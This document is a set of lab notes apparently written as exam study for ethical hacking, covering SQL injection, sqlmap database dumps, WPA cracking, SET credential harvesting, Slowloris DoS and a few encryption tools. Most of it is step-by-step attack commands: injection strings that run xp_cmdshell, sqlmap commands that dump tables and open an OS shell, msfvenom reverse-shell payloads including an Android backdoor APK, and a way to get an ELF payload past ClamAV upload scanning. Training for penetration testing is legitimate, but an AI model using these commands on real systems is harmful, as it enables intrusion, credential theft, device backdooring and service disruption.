Windows Server 2016, Microsoft SQL Server Management Studio (Windows Authentication)
Databases --> GoodShopping --> Tables
right-click dbo.Login and click Select Top 1000 Rows
In Windows 2012, http://www.goodshopping.com Login
u: blah';insert into login values ('john','apple123'); --
Verify login. Check in dbo.Login table as well.
In Windows 2012, http://www.goodshopping.com Login
u: blah';create database mydatabase; --
Windows Server 2016, Check Microsoft SQL Server Management Studio for new database.
In Windows 2012, http://www.goodshopping.com Login
u: blah';exec master..xp_cmdshell 'ping www.xyz.com -l 65000 -t'; --
Windows Server 2016, Task Manager, Check ping.exe running.
Scanning Web Applications Using N-Stalker Tool
Windows Server 2016, N-Stalker Free X
http://www.goodshopping.com, OWASP Policy
Performing SQL Injection attack against MSSQL to extract Databases and WebShell using SQLMAP
In Kali Linux, login to http://www.xyz.com with available user login. View Profile.
Inspect Element > Console tab > type document.cookie > copy cookie value
sqlmap -u “http://www.xyz.com/viewprofile.aspx?id=1” -- cookie=<”cookie value which you have copied”> --dbs
To get tables db xyz, sqlmap -u “http://www.xyz.com/viewprofile.aspx?id=1” --cookie=<”cookie value”> -D xyz --tables
To get columns of table User_Login, sqlmap -u “http://www.xyz.com/viewprofile.aspx?id=1” --cookie=<”cookie value”> -D xyz -T User_Login --columns
To dump table User_Login, sqlmap -u “http://www.xyz.com/viewprofile.aspx?id=1” --cookie=<”cookie value”> -D xyz -T User_Login --dump
To gain OS shell, sqlmap -u “http://www.xyz.com/viewprofile.aspx?id=1” --cookie=<”cookie value”> --os-shell
optimize value(s) for DBMS delay responses - Y
hostname
ipconfig
Module 16: Hacking Wireless Networks WiFi Packet Analysis using Wireshark 802.11 protocol indicates wireless packets Cracking a WEP with Aircrack-ng aircrack-ng WEPcrack01.cap Cracking a WPA (Wi-Fi Protected Access) with Aircrack-ng aircrack-ng -a2 -b 20:E5:2A:E4:38:00 -w /root/Desktop/Wordlists/Passwords.txt '/root/Desktop/Sample Captures/WPA2crack-01.cap' -a is the technique used to crack the handshake, 2=WPA technique. -b refers to bssid; replace with the BSSID of the target router. -w stands for wordlist; provide the path to a wordlist.
Module 17: Hacking Mobile Platforms Creating Binary Payloads using Kali Linux to Hack Android In Android, root terminal: ip addr add 10.10.10.69/24 dev eth0 In Kali Linux, service postgresql start msfvenom -l msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.10.11 R > Desktop/Backdoor.apk Share Backdoor.apk using web server. msfconsole use exploit/multi/handler show options set payload android/meterpreter/reverse_tcp set LHOST 10.10.10.11 show options (check listening port) exploit -j -z In Android, download Backdoor.apk & install. In Kali Linux, session is created automatically, if not: sessions -i 1 sysinfo ipconfig pwd; cd /sdcard; pwd; ls ps Harvesting User's Credentials Using the Social Engineering Toolkit In Android, root terminal: ip addr add 10.10.10.69/24 dev eth0 In Kali Linux, Applications --> 08 - Exploitation Tools --> social engineering toolkit. bleeding-edge repos - No 1 - Social-Engineering Attacks 2 - Website Attack Vectors 3 - Credential Harvester Attack Method 2 - Site Cloner POST back in Harvester/Tabnabbing - IP of Kali Linux (10.10.10.11) Enter the url to clone - http://www.goodshopping.com Do you want to attempt to stop apache server? (Y/N) - Y In Android, Access the cloned website. Try logging in. Will be redirected to a Webpage not available page In Kali Linux, setoolkit captures login credentials. Check /usr/share/set/src/logs/harvester.log
Module 19: Cloud Computing Creating User Accounts and Assigning User Rights in ownCloud Securing ownCloud from Malicious File uploads using ClamAV In Kali Linux, msfvenom -p windows/meterpreter/reverse_tcp -f exe > /root/Desktop/trojan.exe ownCloud blocks this at upload. Bypassing ownCloud Antivirus and Hacking the Host using Kali Linux In Kali Linux, msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.10.10.11 LPORT=4444 --platform linux -f elf > /root/Desktop/exploit.elf ownCloud upload goes on. msfconsole use multi/handler show options set payload linux/x86/shell/reverse_tcp set LHOST 10.10.10.11 set LPORT 4444 run In Ubuntu, download exploit.elf chmod -R 755 exploit.elf ./exploit.elf In Kali Linux, session is created automatically, if not: sessions -i 1 ifconfig, pwd, whoami Implementing DoS Attack on Linux Cloud Server Using Slowloris Script In Kali Linux, run Wireshark and monitor. chmod 777 Slowloris.pl ./Slowloris.pl -dns 10.10.10.9 Check Wireshark. Ctrl+C attack.
Module 20: Cryptography Calculating One-Way Hashes Using HashCalc Calculating MD5 Hashes Using MD5 Calculator MD5 is not collision resistant; therefore, it is better to use the latest algorithms, such as SHA-2 and SHA-3. Understanding File and Text Encryption Using CryptoForge Encrypting and Decrypting the Data Using BCTextEncoder Creating and Using Self-Signed Certificate Using IIS Manager Basic Disk Encryption Using VeraCrypt Create Volume Create an encrypted file container Standard VeraCrypt volume AES/SHA-512 Basic Data Encryption Using CrypTool
All credits goes to: https://github.com/nirangadh/ceh-practical
